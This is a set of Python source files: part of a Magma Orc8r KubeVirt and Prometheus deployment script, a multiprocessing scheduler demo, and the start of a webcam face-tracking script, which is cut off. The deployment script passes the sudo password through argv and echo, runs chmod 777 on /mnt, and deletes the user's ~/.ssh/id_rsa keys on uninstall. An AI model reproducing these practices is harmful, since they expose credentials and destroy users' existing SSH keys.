myprint("FAIL", "kubeadm installed : NO")
try:
cmd = 'helm version > %s' % INFRA_SOFTWARE_VER
out = os.system(cmd)
if out == 0:
myprint("GREEN", "HELM installed : YES")
with open(INFRA_SOFTWARE_VER) as fop3:
helm_version = fop3.readline().split(',')
logging.debug("%s" % helm_version[0].split('{')[1])
else:
raise NotInstalled
except NotInstalled:
print("Helm is not installed")
myprint("FAIL", "HELM installed : NO")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", " installing kubevirt and cdi")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
#Delete files if they exist
def del_files(file):
if os.path.exists(file):
os.remove(file)
#Un-installing all the k8s objects and deleting the temporary files in the path /tmp/Orc8r_temp/
def un_install(pwd):
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", " Uninstalling Orc8r monitoring stack ")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", "*****Trying to Un-install Helm Charts*****")
execute_cmd("helm uninstall prometheus stable/prometheus-operator --namespace kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_thanosrulers.yaml -n kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_servicemonitors.yaml -n kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_prometheusrules.yaml -n kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_prometheuses.yaml -n kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_podmonitors.yaml -n kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_alertmanagers.yaml -n kubevirt")
myprint("BLUE", "*****Trying to Cleanup the temporay files & Directories created as part of installation*****")
del_files(INFRA_SOFTWARE_VER)
del_files(K8S_GET_DEP)
del_files(K8S_GET_SVC)
if os.path.exists(ORC8R_TEMP_DIR):
shutil.rmtree(ORC8R_TEMP_DIR)
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", " Orc8r monitoring stack Uninstalled successfully")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
#Get magmadev VM IP
def get_magmadev_vm_ip():
cmd = "kubectl get vmi -n kubevirt | awk '{print $1, $4}'"
data = subprocess.Popen([cmd], stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell=True)
stdout, stderr = data.communicate()
vmi_list = stdout.strip().decode("utf-8").split("\n")
for vmi in vmi_list:
if "magmadev" in vmi:
return vmi.split(" ")[1]
#Deleting route information
def del_route(pwd):
myprint("WARNING", "*****Trying to Un-install all 3 magma Virtual Machines*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo route del -net 192.168.60.0 netmask 255.255.255.0 dev br0' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo route del -net 192.168.129.0 netmask 255.255.255.0 dev br1' /dev/null" % pwd
execute_cmd(cmd)
#Deleting iptables rules
def del_iptables(pwd):
myprint("BLUE", "*****Trying to delete iptables rules added as part of installation*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo iptables -D FORWARD -s 192.168.0.0/16 -j ACCEPT' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo iptables -D FORWARD -d 192.168.0.0/16 -j ACCEPT' /dev/null" % pwd
execute_cmd(cmd)
#Deleting 3 VMs magmatraffic, magmatest, magmadev
def del_vms():
myprint("BLUE", "*****Deleting Alertmanger configurations*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/endpoint.yml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/service.yml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/service_monitor.yml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/alert_rules.yml")
myprint("BLUE", "*****Revert the changes like remove magmadev VM IP from endpoint.yml, service.yml files*****")
MAGMA_DEV_VM_IP = get_magmadev_vm_ip()
os.chdir(TEMPLATES_DIR)
for line in fileinput.input("endpoint.yml", inplace=True):
if "ip" in line:
print(line.replace(MAGMA_DEV_VM_IP, "YOUR_MAGMA_DEV_VM_IP"))
else:
print(line)
for line in fileinput.input("service.yml", inplace=True):
if "externalName:" in line:
print(line.replace(MAGMA_DEV_VM_IP, "YOUR_MAGMA_DEV_VM_IP"))
else:
print(line)
os.chdir(CWD)
myprint("BLUE", "*****Deleting 3 VMs magmatraffic, magmatest, magmadev*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_traffic.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_test.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_dev.yaml")
#Deleting DataVolumes which were created to upload the Debian image
def del_dvs(pwd):
myprint("BLUE", "*****Deleting DataVolumes which are created for upload the Debian Image*****")
execute_cmd("kubectl delete dv magma-traffic -n kubevirt")
execute_cmd("kubectl delete dv magma-test -n kubevirt")
execute_cmd("kubectl delete dv magma-dev -n kubevirt")
time.sleep(10)
myprint("BLUE", "*****Deleting PersistantVolumes [PVs] which are created for upload the Debian Image*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_dev_pv.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_test_pv.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_traffic_pv.yaml")
myprint("BLUE", "*****Deleting disk.img and tmpimage under /mnt path*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_dev/' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_dev_scratch/' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_test/' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_test_scratch/' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_traffic/' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_traffic_scratch/' /dev/null" % pwd
execute_cmd(cmd)
#Deleting network-attachment-definitions
def del_network_attachment_definition():
myprint("BLUE", "*****Deleting Network-attachment-definitions*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/net_attach_def.yml")
#Removing ssh public key
def remove_ssh_key():
myprint("BLUE", "*****Removing the id_rsa ssh-key [ssh public key]*****")
execute_cmd("rm ~/.ssh/id_rsa.pub")
execute_cmd("rm ~/.ssh/id_rsa")
#Delete bridges created to communicate with VMs
def del_bridges(pwd):
myprint("BLUE", "*****Deleting Bridges created to communicate with VMs*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo ifconfig br0 down' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo ifconfig br1 down' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo brctl delbr br0' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo brctl delbr br1' /dev/null" % pwd
execute_cmd(cmd)
#Deleting virtctl
def del_virtctl(pwd):
myprint("BLUE", "*****Deleting virtctl*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm /usr/local/bin/virtctl' /dev/null" % pwd
execute_cmd(cmd)
#Deleting CDI
def del_cdi():
myprint("BLUE", "*****Deleting EFK [ElasticSearch Fluentd Kibana] configurations*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/kubevirt_efkchart.yaml -n kubevirt")
myprint("BLUE", "*****Deleting Containerized Data Import [CDI]*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/cdi-cr.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/cdi-operator.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/storage-setup.yml")
#Deleting kubevirt
def del_kubevirt():
myprint("BLUE", "*****Deleting kubevirt*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/kubevirt-cr.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/kubevirt-operator.yaml")
#Un-installing multus-cni plugin
def un_install_multus():
myprint("BLUE", "*****Un-installing multus-cni plugin*****")
os.chdir(MULTUS_DIR)
execute_cmd("cat ./images/multus-daemonset.yml | kubectl delete -f -")
os.chdir(TEMPLATES_DIR)
if os.path.exists(MULTUS_DIR):
shutil.rmtree(MULTUS_DIR)
os.chdir(CWD)
#Deleting temporary files and directories created as part of VM installation
def del_temp_files():
myprint("BLUE", "*****Deleting Temperary files and directories created as part of VM installation*****")
del_files(INFRA_SOFTWARE_VER)
del_files(K8S_GET_OBJ)
if os.path.exists(ORC8R_VM_DIR):
shutil.rmtree(ORC8R_VM_DIR)
#Uninstalling VMs
def un_install_vm(pwd):
del_route(pwd)
del_iptables(pwd)
del_vms()
del_dvs(pwd)
del_network_attachment_definition()
remove_ssh_key()
del_bridges(pwd)
del_virtctl(pwd)
del_cdi()
del_kubevirt()
un_install_multus()
del_temp_files()
#Check whether pods and deployments are Running
def check_status(obj, namespace):
print("check_satus", obj, namespace)
if os.path.exists(ORC8R_VM_DIR):
shutil.rmtree(ORC8R_VM_DIR)
os.mkdir(ORC8R_VM_DIR)
if obj == "pod":
cmd = "kubectl get pods -n " + namespace + " | awk " + "'{{if ($3 ~ " + '!"Running"' + " || $3 ~ " + '!"STATUS"' + ") print $1,$3};}' > " + K8S_GET_OBJ
elif obj == "deployment":
cmd = "kubectl get deployment -n " + namespace + " | awk " + "'{{if ($2 ~ " + '!"1"' + " || $2 ~ " + '!"READY"' + ") print $1,$2};}' > " + K8S_GET_OBJ
execute_cmd(cmd)
    if os.stat(K8S_GET_OBJ).st_size == 0:
return
with open(K8S_GET_OBJ) as fop:
while True:
line = fop.readline()
if not line:
break
myprint("WARNING", obj + "is not yet Running, please wait for a while")
time.sleep(5)
check_status(obj, namespace)
# thread1 : Getting the status of k8s objects like deployment and updating the k8s_obj_dict dictionary
def get_status(lock):
while True:
if os.path.exists(K8S_GET_DEP):
if os.stat(K8S_GET_DEP).st_size == 0:
break
for values in k8s_obj_dict.values():
#Get the deployment which are not in Running state
cmd = "kubectl get deployment -n kubevirt | awk " + "'{{if ($2 ~ " + '!"1"' + " || $2 ~ " + '!"READY"' + ") print $1,$2};}' > " + K8S_GET_DEP
execute_cmd(cmd)
with open(K8S_GET_DEP) as fop1:
while True:
k8s_obj_file1_line = fop1.readline()
if not k8s_obj_file1_line:
break
k8s_obj_name_list1 = k8s_obj_file1_line.split(' ')
for key in k8s_obj_dict.keys():
#Checking whether any key matches with deployment which are not in Running state
if re.search(k8s_obj_name_list1[0], key):
myprint("WARNING", "Few k8s Objects not Running YET!! Be patient, Please wait for a while")
#Get the latest status of all the deployments
cmd = "kubectl get deployment -n kubevirt | awk " + "'{{if (NR != 1) print $1,$2};}' > " + K8S_GET_SVC
execute_cmd(cmd)
with open(K8S_GET_SVC) as fop2:
while True:
k8s_obj_file2_line = fop2.readline()
if not k8s_obj_file2_line:
break
k8s_obj_name_list2 = k8s_obj_file2_line.split(' ')
#Update the latest status of deployment into the k8s_obj_dict dictionary
if re.search(k8s_obj_name_list1[0], k8s_obj_name_list2[0]):
lock.acquire()
k8s_obj_dict[key][0] = k8s_obj_name_list2[1]
lock.release()
# thread2 : Getting the ports from running services and printing URL
def get_ports(lock):
#Get the hostip into host_ip local variable
host_ip = socket.gethostbyname(socket.gethostname())
for key, values in k8s_obj_dict.items():
if values[1] == 0:
if len(values) > 2:
port = values[2]
cmd = "http://" + host_ip + ":" + port
print("URL for :%s -->> %s"%(key,cmd))
webbrowser.open(cmd, new=2)
lock.acquire()
values[1] = 1
lock.release()
#Configure alert manager to get alerts from magmadev VM where AGW was Running
def configure_alert_manager():
myprint("BLUE", "*****Get the magmadev VM IP and update in service.yml, endpoint.yml to get the alerts from magmadev VM*****")
MAGMA_DEV_VM_IP = get_magmadev_vm_ip()
os.chdir(TEMPLATES_DIR)
for line in fileinput.input("endpoint.yml", inplace=True):
if "ip" in line:
print(line.replace("YOUR_MAGMA_DEV_VM_IP", MAGMA_DEV_VM_IP))
else:
print(line)
for line in fileinput.input("service.yml", inplace=True):
if "externalName:" in line:
print(line.replace("YOUR_MAGMA_DEV_VM_IP", MAGMA_DEV_VM_IP))
else:
print(line)
os.chdir(CWD)
myprint("BLUE", "*****Applying the yaml files required to get the alerts from magmadev VM*****")
execute_cmd("kubectl apply -f $PWD/../helm/templates/endpoint.yml")
execute_cmd("kubectl apply -f $PWD/../helm/templates/service.yml")
execute_cmd("kubectl apply -f $PWD/../helm/templates/service_monitor.yml")
execute_cmd("kubectl apply -f $PWD/../helm/templates/alert_rules.yml")
#From the k8s services updating k8s_obj_dict dictionary and creating get_status, get_ports threads
def start_to_run():
cmd = "kubectl get services -n kubevirt | awk " + "'{{if ($5 ~ " + '"TCP"' + " || $5 ~ " + '"UDP"' + ") print $1, $5};}' > " + K8S_GET_SVC
execute_cmd(cmd)
#Initializing the k8s_obj_dict with default values list[0, 0] for each key:k8s_obj_name
with open(K8S_GET_SVC) as fop:
while True:
k8s_obj_file_line = fop.readline()
if not k8s_obj_file_line:
break
k8s_obj_name_list = k8s_obj_file_line.split(' ')
k8s_obj_dict[k8s_obj_name_list[0]] = [0, 0]
#Updating the k8s_obj_dict with ports as values for each key:k8s_obj_name
ports_list = k8s_obj_name_list[1].split('/')
if len(ports_list[0].split(':')) > 1:
for key in k8s_obj_dict.keys():
if re.search(k8s_obj_name_list[0], key):
k8s_obj_dict.setdefault(key, []).append(ports_list[0].split(':')[1])
t1 = threading.Thread(target=get_status, args=(lock,))
t2 = threading.Thread(target=get_ports, args=(lock,))
t1.start()
t2.start()
t1.join()
t2.join()
#Applying all the yaml files to create all k8s objects
def run_services():
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", " Installing Orc8r monitoring stack")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
execute_cmd("helm repo add prometheus-community https://prometheus-community.github.io/helm-charts")
execute_cmd("helm repo add stable https://charts.helm.sh/stable")
execute_cmd("helm repo update")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_alertmanagers.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_podmonitors.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_prometheuses.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_prometheusrules.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_servicemonitors.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_thanosrulers.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/kubevirt_efkchart.yaml -n kubevirt")
time.sleep(3)
execute_cmd("helm install prometheus stable/prometheus-operator --namespace kubevirt")
myprint("FAIL", "change type(key) value from 'ClusterIP' to 'NodePort' and save it")
time.sleep(3)
execute_cmd("kubectl edit service/prometheus-prometheus-oper-alertmanager -n kubevirt")
myprint("FAIL", "change type(key) value from 'ClusterIP' to 'NodePort' and save it")
time.sleep(3)
execute_cmd("kubectl edit service/prometheus-grafana -n kubevirt")
myprint("FAIL", "change type(key) value from 'ClusterIP' to 'NodePort' and save it")
time.sleep(3)
execute_cmd("kubectl edit service/prometheus-prometheus-oper-prometheus -n kubevirt")
configure_alert_manager()
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", " Orc8r monitoring stack installed successfully")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("HDR", "-------------------------------------------------")
myprint("WARNING", " Printing URL's for Dashboards")
myprint("HDR", "-------------------------------------------------")
start_to_run()
#Install multus plugin which will be used for creating multiple interfaces in VM in addition to the default interfaces
def install_multus_plugin():
myprint("BLUE", "*****Installing multus plugin which is used for creating multiple interfaces in VM in addition to the default interfaces*****")
os.chdir(TEMPLATES_DIR)
execute_cmd("git clone https://github.com/intel/multus-cni.git")
os.chdir(MULTUS_DIR)
execute_cmd("cat ./images/multus-daemonset.yml | kubectl apply -f -")
os.chdir(CWD)
#Install kubevirt, which allows running virtual machines alongside your containers on a k8s platform
def install_kubevirt():
myprint("BLUE", '*****Installing KubeVirt which allows to run virtual machines along with containers in k8s platform*****')
execute_cmd("kubectl apply -f $PWD/../helm/templates/kubevirt-operator.yaml")
check_status("pod", "kubevirt")
execute_cmd("kubectl create configmap kubevirt-config -n kubevirt --from-literal debug-useEmulation=true")
execute_cmd("kubectl apply -f $PWD/../helm/templates/kubevirt-cr.yaml")
check_status("pod", "kubevirt")
myprint("BLUE", "*****Wait until all KubeVirt components is up*****")
execute_cmd("kubectl -n kubevirt wait kv kubevirt --for condition=Available")
#Install Containerized Data Importer [CDI], used to import VM images and to create and control PVCs
def install_cdi():
myprint("BLUE", "*****Installing COntainerized Data Importer[CDI] used to import VM images to create PVC*****")
execute_cmd("kubectl create -f $PWD/../helm/templates/storage-setup.yml")
execute_cmd("kubectl create -f $PWD/../helm/templates/cdi-operator.yaml")
execute_cmd("kubectl create -f $PWD/../helm/templates/cdi-cr.yaml")
check_status("pod", "cdi")
#Install virtctl, which is used to create the DV/PVC to upload disk.img and also to connect to and control VMs via the CLI
def install_virtctl(pwd):
myprint("BLUE", '*****Installing virtctl which is used to create DV,PVC to upload disk.img*****')
os.chdir(TEMPLATES_DIR)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo install virtctl /usr/local/bin' /dev/null" % pwd
execute_cmd(cmd)
os.chdir(CWD)
#Create Bridges which are required to communicate between Host to VM and VM to VM
def create_bridges(pwd):
myprint("BLUE", "*****Creating Bridges required to communicate between Host to VM and VM to VM*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo brctl addbr br0' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo brctl addbr br1' /dev/null" % pwd
execute_cmd(cmd)
#Creating NetworkAttachmentDefinition to configure Network Attachment with a L2 Bridge and Vlan
def create_network_attachment_definition():
myprint("BLUE", "*****Creating NetworkAttachmentDefinition to configure Network Attachment with a L2 Bridge*****")
execute_cmd("kubectl create -f $PWD/../helm/templates/net_attach_def.yml")
#Generate an ssh key and inject it into the debian qcow2 image to enable passwordless authentication as the root user
def generate_ssh_public_key(pwd):
os.chdir(TEMPLATES_DIR)
if not os.path.exists(DEBIAN_QCOW2_FILE):
myprint("WARNING", "*****debian-9-openstack-amd64.qcow2 image is not present under magma/cn/deploy/helm/templates/ directory script will download it, Please be patient!! it may take some time based on your bandwidth!!*****")
execute_cmd("wget http://cdimage.debian.org/cdimage/openstack/current-9/debian-9-openstack-amd64.qcow2")
else:
myprint("BLUE", "*****debian-9-openstack-amd64.qcow2 image is already present under magma/cn/deploy/helm/templates/ directory so skipping download!!*****")
myprint("BLUE", "*****Generating password-less SSH key and inject to debian qcow2 image*****")
execute_cmd('ssh-keygen -f ~/.ssh/id_rsa -q -N "" 0>&-')
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo virt-sysprep -a debian-9-openstack-amd64.qcow2 --ssh-inject root:file:$HOME/.ssh/id_rsa.pub' /dev/null" % pwd
execute_cmd(cmd)
os.chdir(CWD)
execute_cmd("kubectl -n kubevirt wait kv kubevirt --for condition=Available")
time.sleep(10)
#Create DataVolumes for the magmadev, magmatest and magmatraffic VMs. These DataVolumes will mount the corresponding PVCs
def create_datavolume(pwd):
myprint("BLUE", "*****Creating DataVolumes to mount debian qcow2 image *****")
    #Get the cdi-uploadproxy service IP address, which is used to build the image-upload URL
cmd = "kubectl get svc -n cdi | grep 'cdi-uploadproxy' | awk '{print $3}'"
data = subprocess.Popen(cmd, shell=True, stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
stdout, stderr = data.communicate()
cdi_uplaod_proxy_ip_add = stdout.strip().decode('utf-8')
#Create directories under /mnt to store disk.img from the mounted PVC
myprint("BLUE", "*****Create directories under /mnt to store disk.img under /mnt from the mounted PVC *****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_dev' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_dev_scratch' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_test' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_test_scratch' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_traffic' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_traffic_scratch' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo chmod 777 /mnt/*' /dev/null" % pwd
execute_cmd(cmd)
#Create PVs which are going to claim by PVCs
myprint("BLUE", "*****Create PVs which are going to Claim by PVCs*****")
execute_cmd("kubectl apply -f $PWD/../helm/templates/magma_dev_pv.yaml")
execute_cmd("kubectl apply -f $PWD/../helm/templates/magma_test_pv.yaml")
execute_cmd("kubectl apply -f $PWD/../helm/templates/magma_traffic_pv.yaml")
#Create DataVolume[dv] which will mount the debian qcow2 disk.img to corresponding mounted path under /mnt
myprint("BLUE", "*****Create DataVolume[dv] which will mount the debian qcow2 disk.img to directory under /mnt*****")
try:
cmd = "virtctl image-upload dv magma-dev --namespace kubevirt --pvc-size=50Gi --image-path $PWD/../helm/templates/debian-9-openstack-amd64.qcow2 --uploadproxy-url=https://%s:443 --insecure" % cdi_uplaod_proxy_ip_add
execute_cmd(cmd)
cmd = "virtctl image-upload dv magma-test --namespace kubevirt --pvc-size=50Gi --image-path $PWD/../helm/templates/debian-9-openstack-amd64.qcow2 --uploadproxy-url=https://%s:443 --insecure" % cdi_uplaod_proxy_ip_add
execute_cmd(cmd)
cmd = "virtctl image-upload dv magma-traffic --namespace kubevirt --pvc-size=50Gi --image-path $PWD/../helm/templates/debian-9-openstack-amd64.qcow2 --uploadproxy-url=https://%s:443 --insecure" % cdi_uplaod_proxy_ip_add
execute_cmd(cmd)
except NotInstalled:
print("Image upload not completed")
myprint("FAIL", "Image upload not completed")
#Creating 3 VMs magmadev, magmatest, magmatraffic
def create_vm():
myprint("BLUE", "*****Creating 3 VMs magmadev, magmatest, magmatraffic*****")
execute_cmd("kubectl create -f $PWD/../helm/templates/magma_dev.yaml")
execute_cmd("kubectl create -f $PWD/../helm/templates/magma_test.yaml")
execute_cmd("kubectl create -f $PWD/../helm/templates/magma_traffic.yaml")
myprint("BLUE", "*****Wait for some time to VM to wake up to Running state*****")
time.sleep(10)
#Adding route information of Bridge
def add_route_info(pwd):
myprint("BLUE", "*****Add route information of bridge*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo ifconfig br0 up' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo ifconfig br1 up' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo route add -net 192.168.60.0 netmask 255.255.255.0 dev br0' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo route add -net 192.168.129.0 netmask 255.255.255.0 dev br1' /dev/null" % pwd
execute_cmd(cmd)
#Updating iptables to forward VM traffic
def add_iptables_rule(pwd):
myprint("BLUE", "*****Update iptables to forward VM traffic*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo iptables -A FORWARD -s 192.168.0.0/16 -j ACCEPT' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo iptables -A FORWARD -d 192.168.0.0/16 -j ACCEPT' /dev/null" % pwd
execute_cmd(cmd)
#Create the magmadev, magmatest, magmatraffic [3 VMs] step by step
def install_vm(pwd):
install_multus_plugin()
install_kubevirt()
install_cdi()
install_virtctl(pwd)
create_bridges(pwd)
create_network_attachment_definition()
generate_ssh_public_key(pwd)
create_datavolume(pwd)
create_vm()
add_route_info(pwd)
add_iptables_rule(pwd)
#Displays the Usage of the script
def get_help(color):
myprint(color, './MVC2_5G_Orc8r_deployment_script.py -p <sudo-password> -i')
myprint(color, './MVC2_5G_Orc8r_deployment_script.py -p <sudo-password> -u')
myprint(color, ' (OR) ')
myprint(color, './MVC2_5G_Orc8r_deployment_script.py --password <sudo-password> --install')
myprint(color, './MVC2_5G_Orc8r_deployment_script.py --password <sudo-password> --uninstall')
def main(argv):
password = ''
try:
opts, args = getopt.getopt(argv, "hiup:", ["help", "install", "uninstall", "password="])
except getopt.GetoptError:
get_help("FAIL")
for opt, arg in opts:
if (re.match("-h", opt) or re.match("--help", opt)):
get_help("BLUE")
elif (opt == "-p" or opt == "--password"):
password = arg
elif (opt == "-i" or opt == "--install"):
myprint("HDR", "-------------------------------------------------")
myprint("GREEN", " Checking Pre-requisites: ")
myprint("HDR", "-------------------------------------------------")
check_pre_requisite()
install_vm(password)
run_services()
myprint("HDR", "-------------------------------------------------")
myprint("WARNING", " URL's for Dashboards printed successfully")
myprint("HDR", "-------------------------------------------------")
elif (opt == "-u" or opt == "--uninstall"):
un_install_vm(password)
un_install(password)
if __name__ == "__main__":
main(sys.argv[1:])
|
scheduler.py
|
#!/usr/bin/env python
from multiprocessing import Process, Queue
from uuid import uuid4
import time, sys
from random import random
class Scheduler:
def __init__(self, maxsize):
q_in = Queue()
work_q = Queue(maxsize = maxsize)
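        # work_q acts as a bounded token queue: putting a job here blocks once maxsize
        # jobs are in flight, and each finished task pops one entry to free a slot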
def worker():
while True:
sys.stderr.write(">>> qsize=%d waiting=%d\n"%(work_q.qsize(), q_in.qsize()))
job = q_in.get()
                if job is False:
sys.stderr.write("Terminating\n")
return
sys.stderr.write("Got job %s\n"%job.ident)
work_q.put(job)
sys.stderr.write("Executing job %s\n"%job.ident)
def task():
t1 = time.time()
job.scan()
if job.posthook:
sys.stderr.write('Executing post hook for job %s\n'%job.ident)
job.posthook()
try:
x = work_q.get(timeout=job.timeout)
sys.stderr.write('delta %.2f x: %s\n'%(time.time()-t1,str(x)))
except:
raise
sys.stderr.write("Done with job %s\n"%job.ident)
p = Process(target = task)
p.start()
sys.stderr.write("<<< qsize=%d waiting=%d\n"%(work_q.qsize(), q_in.qsize()))
self.q_in = q_in
self.work_q = work_q
p = Process(target = worker)
p.start()
def qsize(self):
return self.q_in.qsize() + self.work_q.qsize()
def status(self):
return "%d / %d"%(self.work_q.qsize(), self.q_in.qsize())
def add_job(self, job):
self.q_in.put(job, False)
def stop(self):
self.q_in.put(False, False)
class idgen:
def __init__(self):
self.i=0
def getid(self):
self.i += 1
return "id-%s"%self.i
i = idgen()
class FakeScan:
def __init__(self):
self.duration = 1.0 + 5.0 * random()
self.ident = i.getid()
self.posthook = None
self.timeout = 2
def scan(self):
sys.stdout.write("Scanning... %s\n" % self.ident)
time.sleep(self.duration)
sys.stdout.write("Scanned %s\n" % self.ident)
if __name__=='__main__':
scans = []
for x in range(5):
scans.append(FakeScan())
s = Scheduler(2)
for x in scans:
s.add_job(x)
sys.stderr.write("Added job %s to scheduler\n"%x.ident)
sys.stderr.write("Done adding jobs to scheduler\n")
s.stop()
|
main.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed May 6 03:38:43 2020
@author: hp
"""
import webbrowser
import time
import os
import threading
import cv2
import dlib
import numpy as np
from yolo_helper import YoloV3, load_darknet_weights, draw_outputs
from dlib_helper import (shape_to_np,
eye_on_mask,
contouring,
process_thresh,
print_eye_pos,
nothing)
from define_mouth_distances import return_distances
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
yolo = YoloV3()
load_darknet_weights(yolo, 'yolov3.weights')
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('shape_68.dat')
d_outer, d_inner = return_distances(detector, predictor)
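# d_outer/d_inner hold the baseline (closed-mouth) vertical distances between the outer/inner lip landmark pairs, used below to detect an open mouth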
cap = cv2.VideoCapture(0)
_, frame_size = cap.read()
def eyes_mouth():
ret, img = cap.read()
thresh = img.copy()
    h, w = img.shape[:2]
outer_points = [[49, 59], [50, 58], [51, 57], [52, 56], [53, 55]]
inner_points = [[61, 67], [62, 66], [63, 65]]
left = [36, 37, 38, 39, 40, 41]
right = [42, 43, 44, 45, 46, 47]
kernel = np.ones((9, 9), np.uint8)
cv2.namedWindow('image')
cv2.createTrackbar('threshold', 'image', 0, 255, nothing)
while True:
ret, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
rects = detector(gray, 1)
for rect in rects:
shape = predictor(gray, rect)
shape = shape_to_np(shape)
#mouth
cnt_outer = 0
cnt_inner = 0
for i, (p1, p2) in enumerate(outer_points):
if d_outer[i] + 5 < shape[p2][1] - shape[p1][1]:
